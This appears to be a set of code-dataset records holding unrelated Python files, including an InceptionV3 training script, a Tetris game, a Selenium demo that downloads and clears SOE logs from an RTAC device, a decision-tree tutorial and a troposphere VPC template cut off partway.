steps_per_epoch=ceil(len(train_samples)/batch_size),\n validation_data=validation_generator,\n validation_steps=ceil(len(validation_samples)/batch_size),\n# callbacks=[checkpoint, stopper],\n epochs=3,\n verbose=1)\n\n\nmodel.save('model_InceptionV3.h5')\n\n# model.add(Flatten())\n# model.add(Dense(100))\n# model.add(Dense(50))\n# model.add(Dense(10))\n# model.add(Dense(1))\n# model.compile(loss='mse', optimizer='adam')\n# model.fit(X_train, y_train, validation_split=0.2, shuffle=True, nb_epoch=7)\n# model.save('model.h5')\n#\n\n\nimport matplotlib.pyplot as plt\n\n### print the keys contained in the history object\nprint(history_object.history.keys())\n\n### plot the training and validation loss for each epoch\nplt.plot(history_object.history['loss'])\nplt.plot(history_object.history['val_loss'])\nplt.title('model mean squared error loss')\nplt.ylabel('mean squared error loss')\nplt.xlabel('epoch')\nplt.legend(['training set', 'validation set'], loc='upper right')\nplt.show()\n","sub_path":"InceptionV3.py","file_name":"InceptionV3.py","file_ext":"py","file_size_in_byte":5600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"133048666","text":"from datetime import date\nano = int(input('Digite o ano de seu 
nascimento:'))\natual = date.today().year\nidade = atual - ano\nif idade <= 9:\n print('MIRIM')\nelif 10 <= idade <= 14:\n print('INFANTIL')\nelif idade >= 15 and idade <= 19:\n print('JUNIOR')\nelif idade > 19 and idade < 25:\n print('SENIOR')\nelse:\n print('MASTER')","sub_path":"ExPython/CursoemVideo/ex041.py","file_name":"ex041.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"329354362","text":"# Python Selenium Test\r\n# Dependencies: Python 3.6 or newer, Selenium, Google Chrome, Chromedriver\r\n\r\n## THIS SOFTWARE IS PROVIDED \"AS IS\" AND ANY EXPRESSED OR IMPLIED WARRANTIES,\r\n## INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY\r\n## AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE\r\n## REGENTS OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\r\n## SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED\r\n## TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR\r\n## PROFITS; OR BUSINESS INTERRUPTION)\r\n##\r\n## HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT\r\n## LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY\r\n## OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH\r\n## DAMAGE.\r\n\r\n# Import libraries\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.common.keys import Keys\r\nfrom selenium.webdriver.common.by import By\r\nimport time\r\n\r\n# Master variables\r\nuser = \"admin\" # Username of target RTAC\r\npw = \"Asdf123$\" # Password of target RTAC\r\nIP = \"https://192.168.1.2\" #IP address of target RTAC\r\n\r\n# Welcome user\r\nprint(\"This is a script to automate SOE downloads.\")\r\nprint(\"Script is active and running...\")\r\n\r\n# Activate Selenium\r\n# Chromedriver must be in a known location so that this program can use it.\r\ndriver = webdriver.Chrome(\"C:/Users/Joe Stanley/Desktop/Python Examples/chromedriver.exe\")\r\ndriver.get(IP) # Open webpage\r\n\r\n# Login\r\nelem = driver.find_element_by_id(\"username\")\r\nelem.send_keys(user)\r\nelem = driver.find_element_by_id(\"txtPassword\")\r\nelem.send_keys(pw)\r\nelem.send_keys(Keys.RETURN)\r\n\r\n# Wait for load\r\ntime.sleep(15)\r\n\r\n# Navigate to SOE page\r\nreportLinks = driver.find_element_by_xpath(\"//li[contains(.,'SOE')]\").click()\r\ntime.sleep(3)\r\n\r\n#NOTE: Filtering only applies to web, filtering isn't applied to downloads.\r\n#NOTE: Deleting entries after a filter is applied, then reseting filters\r\n# to download remaining entries may be an option if filtered downloads\r\n# are desired.\r\n# Filter SOE table\r\n# Filter 1\r\ndropDwn1 = driver.find_element_by_id(\"column1\")\r\ndropDwn1.send_keys(\"Tag Name\")\r\nfilterBox1 = driver.find_element_by_id(\"filter1\")\r\nfilterBox1.send_keys(\"*Logged*\")\r\n# And/Or\r\nandor = driver.find_element_by_id(\"oper1\")\r\nandor.send_keys(\"And\")\r\n# Filter 2\r\ndropDwn2 = driver.find_element_by_id(\"column2\")\r\ndropDwn2.send_keys(\"Tag Name\")\r\nfilterBox2 = driver.find_element_by_id(\"filter2\")\r\nfilterBox2.send_keys(\"*On*\")\r\n# Apply Filter\r\nfilterNow = driver.find_element_by_xpath(\"//*[@value='Filter']\").click()\r\ntime.sleep(3) # Wait 3 seconds to show that filtering was applied\r\n# Delete \"Undesired Entries\"\r\ndeleteSoe = driver.find_element_by_id(\"actions_dropdown\")\r\ndeleteSoe.send_keys(\"Delete\")\r\n# Reset Filter\r\nfilterOff = 
driver.find_element_by_xpath(\"//*[@value='Reset']\").click()\r\n\r\n\r\n# Download SOE csv file\r\ndownloadCSV = driver.find_element_by_id(\"download_csv_btn\").click()\r\n\r\n# Wait to delete until download is complete\r\ntime.sleep(45)\r\n\r\n# Delete all SOE logs on visible page (most recent 100 in log)\r\nselectAll = driver.find_element_by_id(\"soe_table_select_all\").click()\r\ndeleteSoe = driver.find_element_by_id(\"actions_dropdown\")\r\ndeleteSoe.send_keys(\"Delete\")\r\n\r\n# Wait to close webpage\r\ntime.sleep(5)\r\n\r\n# Close webpage\r\ndriver.close()\r\n\r\n# Send off user\r\nprint(\"SOE Log has been downloaded.\")\r\nprint(\"Goodbye.\")\r\n\r\n# Wait to finish program\r\ntime.sleep(2)\r\n","sub_path":"Selenium_SOE_Download_Demonstration.py","file_name":"Selenium_SOE_Download_Demonstration.py","file_ext":"py","file_size_in_byte":3501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"391003825","text":"from amset.core import Amset\nimport os\n\nif __name__ == \"__main__\":\n # user inputs:\n use_single_parabolic_band = False\n\n # setting up the inputs:\n model_params = {\"bs_is_isotropic\": True,\n \"elastic_scatterings\": [\"ACD\", \"IMP\", \"PIE\"],\n \"inelastic_scatterings\": [\"POP\"]}\n performance_params = {\"max_nbands\": 1,\n \"interpolation\": \"boltztrap1\",\n \"dos_kdensity\": 600\n }\n if use_single_parabolic_band:\n effective_mass = 0.25\n model_params[\"poly_bands\"]= [[[[0.0, 0.0, 0.0], [0.0, effective_mass]]]]\n\n GaAs_params = {\"epsilon_s\": 12.9,\n \"epsilon_inf\": 10.9,\n \"W_POP\": 8.73,\n \"C_el\": 139.7,\n \"E_D\": {\"n\": 8.6, \"p\": 8.6},\n \"P_PIE\": 0.052,\n \"user_bandgap\": 1.54}\n GaAs_path = \"../../test_files/GaAs_mp-2534\"\n\n # the fort.123 file contains the coefficients of the interpolated band structure;\n # it is generated by a modified version of BoltzTraP\n coeff_file = os.path.join(GaAs_path, \"fort.123\")\n\n amset = Amset(calc_dir='.',\n vasprun_file=os.path.join(GaAs_path, \"vasprun.xml\"),\n material_params=GaAs_params,\n model_params = model_params,\n performance_params=performance_params,\n dopings= [-2e15, -2e18],\n temperatures=[300, 600],\n )\n\n # running Amset\n amset.run_profiled(coeff_file=coeff_file, kgrid_tp=\"coarse\")\n\n # generating files and outputs\n amset.write_input_files()\n amset.to_csv()\n amset.to_file()\n amset.to_json(kgrid=True, trimmed=True, max_ndata=50, n0=0)\n amset.plot(k_plots=['energy'], e_plots='all',\n carrier_types=amset.all_types, save_format=None)","sub_path":"examples/GaAs/GaAs.py","file_name":"GaAs.py","file_ext":"py","file_size_in_byte":1883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"314750885","text":"#PLACE YOUR CODE HERE\nimport pandas\nfrom collections import defaultdict\nfac_lastname = defaultdict(list)\nfac_fullname = {}\nfaculty_df = pandas.read_csv('/Users/Manoj/Documents/metis/prework/faculty.csv',sep='\\s*,\\s*',engine='python')\n\nfor row in faculty_df.itertuples():\n fac_lastname[row.name.split()[-1]].append([row.degree,row.title,row.email])\n fac_fullname[(row.name.split()[0],row.name.split()[-1])] = [row.degree,row.title,row.email]\n\nfacl=sorted(fac_lastname.items())\nfacn=sorted(fac_fullname.items())\nprint (facl[:3],\"\\n\")\nprint (facn[:3],\"\\n\")\nfacn_r=sorted(fac_fullname.items(), key = lambda x: x[0][1])\nprint 
(facn_r[:3])\n\n\n\n\n","sub_path":"python/advanced_python_dict.py","file_name":"advanced_python_dict.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"633507419","text":"# -*- coding:utf-8 -*-\r\n'''\r\nCreated on 2018��10��11��\r\nThis program is used to convert color text to '' form and numbered\r\n@author: Jingyuan Liu\r\n'''\r\n\r\ncolorMap = []\r\nwith open('numSeqColorMap.txt', 'a') as fileWrite:\r\n with open('colorMap.txt', 'r') as filein:\r\n num = 0\r\n for line in filein:\r\n num += 1\r\n print(\"'\"+line.rstrip('\\n')+\"',\")\r\n colorMap.append(\"'\"+line.rstrip('\\n')+\"',\")\r\n fileWrite.write(\"'\"+line.rstrip('\\n')+\"',\")\r\n print(str(num))\r\n fileWrite.write('\\n'+str(num)+'\\n\\n')\r\n fileWrite.close()\r\n \r\nwith open('numSeqColorMap.txt', 'a') as fileWrite:\r\n numSeq = -1\r\n for i in range(39):\r\n for j in range(4):\r\n numSeq += 1\r\n print(str(numSeq+1)+'['+str(i)+']'+'['+str(j)+'] '+ colorMap[numSeq])\r\n fileWrite.write(str(numSeq+1)+'['+str(i)+']'+'['+str(j)+'] '+ colorMap[numSeq] +'\\n')\r\n fileWrite.write('\\n')\r\n fileWrite.close() \r\n\r\nwith open('numSeqColorMap.txt', 'a') as fileWrite:\r\n numS = -1\r\n for i in range(39):\r\n for j in range(4):\r\n numS += 1\r\n print('['+str(i)+']'+'['+str(j)+'] '+ colorMap[numS])\r\n fileWrite.write('['+str(i)+']'+'['+str(j)+'] '+ colorMap[numS])\r\n fileWrite.write('\\n')\r\n fileWrite.close() ","sub_path":"colorMapText.py","file_name":"colorMapText.py","file_ext":"py","file_size_in_byte":1342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"281359910","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\n The classic Tetris developed using PyGame.\n Copyright (C) 2018 Recursos Python - recursospython.com.\n\"\"\"\nimport os\nimport pygame\nimport numpy as np\n\n#Importamos los modulos\nfrom excepciones.excepciones import *\nfrom colores.colores import *\nfrom bloques.bloques import BlocksGroup\nfrom juego.juego import *\n\nimage_play = pygame.image.load(os.path.join('imagenes', 'play.png'))\nimage_pause = pygame.image.load(os.path.join('imagenes', 'pause.png'))\nimage_retry = pygame.image.load(os.path.join('imagenes', 'retry.png'))\nimage_mute = pygame.image.load(os.path.join('imagenes', 'mute.png'))\nimage_volume = pygame.image.load(os.path.join('imagenes', 'volume.png'))\nimage_exit = pygame.image.load(os.path.join('imagenes', 'exit.png'))\n\nWINDOW_WIDTH, WINDOW_HEIGHT = 500, 601\nGRID_WIDTH, GRID_HEIGHT = 300, 600\nTILE_SIZE = 30\n \njuego = Juego(Window(WINDOW_WIDTH,WINDOW_HEIGHT),Grid(GRID_WIDTH,GRID_HEIGHT),TILE_SIZE)\n\ndef draw_centered_surface(screen, surface, y):\n screen.blit(surface, (400 - surface.get_width()/2, y))\n\n\n\ndef main():\n \n pygame.init()\n pygame.display.set_caption(\"Tetris con PyGame\")\n screen = pygame.display.set_mode((WINDOW_WIDTH, WINDOW_HEIGHT))\n run = True\n paused = False\n game_over = False\n volume = True\n # Create background.\n background = pygame.Surface(screen.get_size())\n bgcolor = negro\n background.fill(bgcolor)\n\n track = pygame.mixer.Channel(0)\n track.set_volume(0.25)\n misc_sound = pygame.mixer.Channel(1)\n main_track = pygame.mixer.Sound(os.path.join('sounds', 'musica.mp3'))\n drop_audio = pygame.mixer.Sound(os.path.join('sounds', 'drop.wav'))\n lose_track = pygame.mixer.Sound(os.path.join('sounds', 'lose.mp3'))\n track.play(main_track,-1)\n # Draw the grid on top of the background.\n 
juego.draw_grid(background)\n # This makes blitting faster.\n background = background.convert()\n\n try:\n font = pygame.font.Font(os.path.join('fuentes', '8-bit-blanco.ttf'), 24)\n font_score = pygame.font.Font(os.path.join('fuentes', '8-bit-blanco.ttf'), 32)\n except OSError:\n # If the font file is not available, the default will be used.\n pass\n next_block_text = font.render(\n \"Siguiente figura\", True, blanco, bgcolor)\n score_msg_text = font.render(\n \"Puntaje\", True, blanco, bgcolor)\n game_over_text = font.render(\n \"GAME OVER\", True, rojo, bgcolor)\n paused_text = font.render(\n \"Juego pausado\", True, amarillo, bgcolor)\n boton_play_pause = Boton((400 - image_play.get_width()/2)-50,360,image_play) \n boton_mute = Boton((400 - image_mute.get_width()/2)+50,365,image_mute) \n boton_retry = Boton((400 - image_retry.get_width()/2)-45,490,image_retry) \n boton_exit = Boton((400 - image_exit.get_width()/2)+45,500,image_exit) \n \n # Event constants.\n MOVEMENT_KEYS = pygame.K_LEFT, pygame.K_RIGHT, pygame.K_DOWN, pygame.K_SPACE\n EVENT_UPDATE_CURRENT_BLOCK = pygame.USEREVENT + 1\n EVENT_MOVE_CURRENT_BLOCK = pygame.USEREVENT + 2\n pygame.time.set_timer(EVENT_UPDATE_CURRENT_BLOCK, 1000)\n pygame.time.set_timer(EVENT_MOVE_CURRENT_BLOCK, 50)\n \n blocks = BlocksGroup(juego)\n \n while run:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n run = False\n break\n elif event.type == pygame.KEYUP:\n if not paused and not game_over:\n if event.key in MOVEMENT_KEYS:\n blocks.stop_moving_current_block()\n elif event.key == pygame.K_UP:\n blocks.rotate_current_block()\n \n if event.key == pygame.K_p:\n if not game_over:\n paused = not paused\n if event.key == pygame.K_m:\n if volume and not game_over:\n track.pause()\n else:\n track.unpause() \n volume = not volume \n \n # Stop moving blocks if the game is over or paused.\n if game_over or paused:\n continue \n if event.type == pygame.KEYDOWN:\n if event.key in MOVEMENT_KEYS:\n blocks.start_moving_current_block(event.key)\n if event.key == pygame.K_SPACE:\n pygame.time.set_timer(EVENT_MOVE_CURRENT_BLOCK, 1) \n misc_sound.play(drop_audio,0)\n else: \n pygame.time.set_timer(EVENT_MOVE_CURRENT_BLOCK, 50) \n\n try:\n if event.type == EVENT_UPDATE_CURRENT_BLOCK:\n blocks.update_current_block()\n elif event.type == EVENT_MOVE_CURRENT_BLOCK:\n blocks.move_current_block()\n except TopReached:\n game_over = True\n if volume:\n track.play(lose_track,-1)\n \n # Draw background and grid.\n screen.blit(background, (0, 0))\n # Blocks.\n blocks.draw(screen)\n # Sidebar with misc. 
information.\n draw_centered_surface(screen, next_block_text, 50)\n draw_centered_surface(screen, blocks.next_block.image, 100)\n draw_centered_surface(screen, score_msg_text, 240)\n score_text = font_score.render(\n str(blocks.score), True, blanco, bgcolor)\n draw_centered_surface(screen, score_text, 270)\n if boton_exit.draw(screen): \n break\n if volume:\n boton_mute.image = image_volume\n if boton_mute.draw(screen) and not game_over:\n volume = False\n track.pause()\n else:\n boton_mute.image = image_mute\n if boton_mute.draw(screen) and not game_over:\n volume = True\n track.unpause()\n\n if paused:\n draw_centered_surface(screen, paused_text, 330)\n boton_play_pause.image = image_play\n if boton_play_pause.draw(screen) and not game_over:\n paused = not paused\n else: \n boton_play_pause.image = image_pause\n if boton_play_pause.draw(screen) and not game_over:\n paused = not paused\n\n if game_over:\n draw_centered_surface(screen, game_over_text, 450)\n if boton_retry.draw(screen):\n main()\n break\n # Update.\n pygame.display.flip()\n \n pygame.quit()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"tetris.py","file_name":"tetris.py","file_ext":"py","file_size_in_byte":6612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"318211818","text":"from math import sqrt\n\nprimes = []\nfor num in range(1,100000000):\n end = int(sqrt(num))\n is_prime = True\n for x in range(2, end+1):\n if num % x == 0:\n is_prime = False\n break\n if is_prime and num != 1:\n primes.append(num)\nprint(primes)","sub_path":"exercise_30.py","file_name":"exercise_30.py","file_ext":"py","file_size_in_byte":283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"349672672","text":"\"\"\":parameter\nResource: StatQuest\nLink: https://www.youtube.com/watch?v=q90UDEgYqeI\npredict: 'hd'\n\"\"\"\nimport pandas as pd # to load and manipulate data and for one-hot encoding\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport sklearn\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.tree import plot_tree\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import plot_confusion_matrix\nP_COUNT_F = 'num_pf'\nP_COUNT_B = 'num_pb'\n\ndef dt_clf():\n\tdf = pd.read_csv(r'C:\\Users\\Owner\\DataScience\\MachineLearning\\resources\\DataSets\\processed.cleveland.csv')\n\t\"\"\":parameter\n\tdf columns\n\t['age', 'sex', 'cp', 'restbp', 'chol', 'fbs', 'restecg', 'thalach', 'exang', 'oldpeak', 'slope', 'ca', 'thal', 'hd']\n\t\n\t\"\"\"\n\tprint(\"df data types\\n==================== \\n {}\".format(df.dtypes))\n\tprint(df.columns)\n\t\"\"\":parameter\n\t'thal' and 'ca' are object datatypes, and contain missing values. 
\n\t\"\"\"\n\t# check for missing values\n\tprint(df['ca'].unique())\n\tprint(df['thal'].unique())\n\n\t# Check how many rows contains missing values\n\tprint(\"missing values \\n===============\\n {}\".format(len(df.loc[(df['ca']=='?') | (df['thal']=='?')])))\n\n\t# remove missing values form the dataset\n\tdf_no_missing = df.loc[(df['ca'] != '?') & (df['thal'] != '?')]\n\n\t\"\"\":parameter\n\tFormat Data Part 1: Split the data into Dependent and independent variables \n\t\"\"\"\n\tX = df_no_missing.drop('hd', axis=1).copy()\n\ty = df_no_missing['hd'].copy()\n\n\n\t\"\"\":parameter\n\tWe see that age, restbp, chol, and thalach are all flaot64, which is good, because we want them to be floationg point. \n\tSciokit-learn natively do not support categorical data., like cp contains 4 different categories. So we have use One-hot \n\tencoding to convert a column of catagorical data into multiple columns of binary values. \n\t\"\"\"\n\tX_encoded = pd.get_dummies(X, columns=['cp', 'restecg', 'slope', 'thal'])\n\n\ty_not_zero_index = y > 0\n\ty[y_not_zero_index] = 1\n\n\t\"\"\":parameter\n\tbuild A preliminary classification tree\n\t\"\"\"\n\t# split the data into training and testing sets\n\tX_train, X_test, y_train, y_test = train_test_split(X_encoded, y, random_state=42)\n\n\t# create a decision tree and fit it to the training data\n\tclf_dt = DecisionTreeClassifier(random_state=42)\n\tclf_dt = clf_dt.fit(X_train, y_train)\n\n\t#plot the tree\n\tplt.figure(figsize=(15, 7.5))\n\tplot_tree(clf_dt, filled=True, rounded=True, class_names=['No HD', 'Yes HD'], feature_names=X_encoded.columns);\n\t# plt.show()\n\n\t# plot confusion matrix\n\t# plot_confusion_matrix(clf_dt, X_test, y_test)\n\n\t\"\"\"\":parameter\n\tCost Complexity Pruning Part 1: Visualize alpha\n\t\"\"\"\n\tpath = clf_dt.cost_complexity_pruning_path(X_train, y_train) # determine the value for alpha\n\tccp_alphas = path.ccp_alphas\n\tccp_alphas = ccp_alphas[:-1]\n\t# print(ccp_alphas)\n\n\tclf_dts = []\n\n\tfor ccs_alpha in ccp_alphas:\n\t\tclf_dt = DecisionTreeClassifier(random_state=0, ccp_alpha=ccs_alpha)\n\t\tclf_dt.fit(X_train, y_train)\n\t\tclf_dts.append(clf_dt)\n\n\ttrain_scores = [clf_dt.score(X_train, y_train) for clf_dt in clf_dts]\n\ttest_Scores = [clf_dt.score(X_test, y_test) for clf_dt in clf_dts]\n\n\tfig, ax = plt.subplots()\n\tax.set_xlabel(\"alpha\")\n\tax.set_ylabel(\"accuracy\")\n\tax.set_title(\"Accuracy vs alpha for training and testing sets\")\n\tax.plot(ccp_alphas, train_scores, marker='o', label=\"train\", drawstyle=\"steps-post\")\n\tax.plot(ccp_alphas, test_Scores, marker='o', label=\"test\", drawstyle=\"steps-post\")\n\tax.legend()\n\t# plt.show()\n\n\t\"\"\"\n\tCost Complexity pruning Part 2: Cross Validation for finding the Best Alpha\n\t\"\"\"\n\tclf_dt = DecisionTreeClassifier(random_state=42, ccp_alpha=0.016, )\n\tscores = cross_val_score(clf_dt, X_train, y_train, cv=5)\n\tdf = pd.DataFrame(data={'tree': range(5), 'accuracy': scores})\n\tdf.plot(x='tree', y='accuracy', marker='o', linestyle='--')\n\t# plt.show()\n\n\talpha_loop_values = []\n\tfor ccp_alpha in ccp_alphas:\n\t\tclf_dt = DecisionTreeClassifier(random_state=0, ccp_alpha=ccp_alpha)\n\t\tscores = cross_val_score(clf_dt, X_train, y_train, cv=5)\n\t\talpha_loop_values.append([ccp_alpha, np.mean(scores), np.std(scores)])\n\t# print(alpha_loop_values)\n\n\talpha_results = pd.DataFrame(alpha_loop_values, columns=['alpha', 'mean_accuracy', 'std'])\n\n\talpha_results.plot(x='alpha', y='mean_accuracy', yerr='std', marker='o', linestyle='--')\n\t# 
plt.show()\n\n\tideal_ccp_alpha = alpha_results[(alpha_results['alpha'] > 0.014) & (alpha_results['alpha'] < 0.015) ]['alpha']\n\tprint(ideal_ccp_alpha)\n\n\t# convert ideal_alpha from a series to a float\n\tideal_ccp_alpha = float(ideal_ccp_alpha)\n\tprint(ideal_ccp_alpha)\n\n\t\"\"\":parameter\n\tBuilding, Evaluating, Drawing, and Interpreting the Final Classification Tree\n\t\"\"\"\n\tclf_dt_pruned = DecisionTreeClassifier(random_state=42, ccp_alpha= ideal_ccp_alpha)\n\tclf_dt_pruned = clf_dt_pruned.fit(X_train, y_train)\n\tdisp = plot_confusion_matrix(clf_dt_pruned, X_test, y_test, display_labels=['Does not have HD', \"Has HD\"])\n\tdisp.ax_.set_title(\"Pruned Confusion matrix\")\n\tprint(disp.confusion_matrix)\n\n\n\t# Draw pruned tree\n\tplt.figure(figsize=(15, 7.5))\n\tplot_tree(clf_dt_pruned, filled=True, rounded=True, class_names=['No HD', 'Yes HD'], feature_names=X_encoded.columns)\n\tplt.show()\n\nif __name__ == \"__main__\":\n\tdt_clf()","sub_path":"ml-algorithms/classification/decisionTreeClassifier.py","file_name":"decisionTreeClassifier.py","file_ext":"py","file_size_in_byte":5249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"177685466","text":"class stack:\n\n    def __init__(self):\n        self.stack = []\n\n    def add(self,dataval):\n        #use list append method to add element\n        if dataval not in self.stack:\n            self.stack.append(dataval)\n            return True\n        else:\n            return False\n    \n    #use peek to look at the top of the stack\n    def peek(self):\n        if len(self.stack) == 0:\n            print(\"nothing there\")\n            return False\n        else:\n            return self.stack[-1]\n\n    def remove(self):\n        if len(self.stack) <= 0:\n            return (\"No element in the stack\")\n        else:\n            return self.stack.pop()\n\n# create the stack once, outside the loop, so pushed values persist across menu iterations\nAstack = stack()\nwhile (1):\n    print(\"choose one of the following: \\n 1 : pushing in stack \\n 2 : peeking in stack \\n 3 : popping from stack\")\n    a = int(input())\n    if( a == 1):\n        b = input()\n        Astack.add(b)\n    elif ( a == 2):\n        Astack.peek()\n    elif ( a == 3):\n        Astack.remove()\n    else:\n        print(\"invalid input you stupid! 
\\n\")\n \n","sub_path":"stack.py","file_name":"stack.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"258531847","text":"import sys\nimport troposphere\nfrom troposphere import Parameter, Output\nfrom troposphere import Ref, GetAtt\nimport troposphere.ec2 as ec2\nimport click\n\n\nsys.path.append('..')\nimport helpers\n\nconfig = helpers.read_config()\n\n\n@click.group()\ndef cli():\n pass\n\n\n@cli.command()\n@click.option('--stack_name', help='Name of stack to operate on')\ndef generate_template(stack_name):\n\n region = config['aws_region']\n\n template = troposphere.Template()\n\n ##########################################################################################################\n # Parameters\n ##########################################################################################################\n\n template.add_parameter(\n Parameter(\n title='VpcCidrBlock',\n Type='String',\n Default=config['default_vpc_cidr'],\n AllowedPattern=\"^(\\\\d{1,3})\\\\.(\\\\d{1,3})\\\\.(\\\\d{1,3})\\\\.(\\d{1,3})\\\\/(\\\\d{1,2})\",\n Description='VPC CIDR (X.X.0.0/16)',\n ConstraintDescription=\"Must be a valid CIDR block\"\n )\n )\n\n template.add_parameter(\n Parameter(\n title='PublicACidrBlock',\n Type='String',\n Default=config['default_public_a_cidr'],\n AllowedPattern=\"^(\\\\d{1,3})\\\\.(\\\\d{1,3})\\\\.(\\\\d{1,3})\\\\.(\\d{1,3})\\\\/(\\\\d{1,2})\",\n Description='CIDR block for public subnet in AZ A (X.X.X.0/16)',\n ConstraintDescription=\"Must be a valid CIDR block\"\n )\n )\n\n template.add_parameter(\n Parameter(\n title='PublicBCidrBlock',\n Type='String',\n Default=config['default_public_b_cidr'],\n AllowedPattern=\"^(\\\\d{1,3})\\\\.(\\\\d{1,3})\\\\.(\\\\d{1,3})\\\\.(\\d{1,3})\\\\/(\\\\d{1,2})\",\n Description='CIDR block for public subnet in AZ B (X.X.X.0/16)',\n ConstraintDescription=\"Must be a valid CIDR block\"\n )\n )\n\n template.add_parameter(\n Parameter(\n title='PrivateACidrBlock',\n Type='String',\n Default=config['default_private_a_cidr'],\n AllowedPattern=\"^(\\\\d{1,3})\\\\.(\\\\d{1,3})\\\\.(\\\\d{1,3})\\\\.(\\d{1,3})\\\\/(\\\\d{1,2})\",\n Description='CIDR block for private subnet in AZ A (X.X.X.0/16)',\n ConstraintDescription=\"Must be a valid CIDR block\"\n )\n )\n\n template.add_parameter(\n Parameter(\n title='PrivateBCidrBlock',\n Type='String',\n Default=config['default_private_b_cidr'],\n AllowedPattern=\"^(\\\\d{1,3})\\\\.(\\\\d{1,3})\\\\.(\\\\d{1,3})\\\\.(\\d{1,3})\\\\/(\\\\d{1,2})\",\n Description='CIDR block for private subnet in AZ B (X.X.X.0/16)',\n ConstraintDescription=\"Must be a valid CIDR block\"\n )\n )\n\n template.add_parameter(\n Parameter(\n title='Owner',\n Type='String',\n MinLength=3,\n MaxLength=40,\n Description=\"Owner of VPC - put your name here\",\n ConstraintDescription=\"Must be between 3 and 40 alphanumeric characters\",\n )\n )\n\n template.add_metadata(\n {\n 'AWS::CloudFormation::Interface': {\n 'ParameterGroups': [\n {\n \"Label\": {\"default\": \"Identifier Configuration\"},\n \"Parameters\": [\"Owner\"]\n },\n {\n \"Label\": {\"default\": \"Network Configuration\"},\n \"Parameters\": [\"VpcCidrBlock\", \"PrivateACidrBlock\", \"PrivateBCidrBlock\",\n \"PublicACidrBlock\", \"PublicBCidrBlock\"],\n },\n ]\n }\n }\n )\n\n ##########################################################################################################\n # VPC and Subnets\n 
##########################################################################################################\n\n template.add_resource(\n ec2.VPC(\n title='LabVPC',\n CidrBlock=Ref('VpcCidrBlock'),\n EnableDnsSupport=True,\n EnableDnsHostnames=True,\n Tags=[\n {\n 'Key': 'Name',\n 'Value': stack_name,\n },\n {\n 'Key': 'Environment',\n 'Value': 'Lab',\n },\n {\n 'Key': 'Owner',\n 'Value': Ref('Owner'),\n }\n ],\n )\n )\n\n template.add_resource(\n ec2.Subnet(\n title='PublicSubnetA',\n VpcId=Ref('LabVPC'),\n AvailabilityZone=\"{0}a\".format(region),\n CidrBlock=Ref('PublicACidrBlock'),\n MapPublicIpOnLaunch=True,\n Tags=[\n {\n 'Key': 'Name',\n 'Value': \"{0}.pub.a\".format(stack_name)\n },\n {\n 'Key': 'Environment',\n 'Value': 'Lab',\n },\n {\n 'Key': 'Owner',\n 'Value': Ref('Owner'),\n }\n ],\n )\n )\n\n template.add_resource(\n ec2.Subnet(\n title='PublicSubnetB',\n VpcId=Ref('LabVPC'),\n AvailabilityZone=\"{0}b\".format(region),\n CidrBlock=Ref('PublicBCidrBlock'),\n MapPublicIpOnLaunch=True,\n Tags=[\n {\n 'Key': 'Name',\n 'Value': \"{0}.pub.b\".format(stack_name)\n },\n {\n 'Key': 'Environment',\n 'Value': 'Lab',\n },\n {\n 'Key': 'Owner',\n 'Value': Ref('Owner'),\n }\n ],\n )\n )\n\n template.add_resource(\n ec2.Subnet(\n title='PrivateSubnetA',\n VpcId=Ref('LabVPC'),\n AvailabilityZone=\"{0}a\".format(region),\n CidrBlock=Ref('PrivateACidrBlock'),\n MapPublicIpOnLaunch=False,\n Tags=[\n {\n 'Key': 'Name',\n 'Value': \"{0}.prv.a\".format(stack_name)\n },\n {\n 'Key': 'Environment',\n 'Value': 'Lab',\n },\n {\n 'Key': 'Owner',\n 'Value': Ref('Owner'),\n }\n ],\n )\n )\n\n template.add_resource(\n ec2.Subnet(\n title='PrivateSubnetB',\n VpcId=Ref('LabVPC'),\n AvailabilityZone=\"{0}b\".format(region),\n CidrBlock=Ref('PrivateBCidrBlock'),\n MapPublicIpOnLaunch=False,\n Tags=[\n {\n 'Key': 'Name',\n 'Value': \"{0}.prv.b\".format(stack_name)\n },\n {\n 'Key': 'Environment',\n 'Value': 'Lab',\n },\n {\n 'Key': 'Owner',\n 'Value': Ref('Owner'),\n }\n ],\n )\n )\n\n ##########################################################################################################\n # Internet gateway and NAT Gateways\n 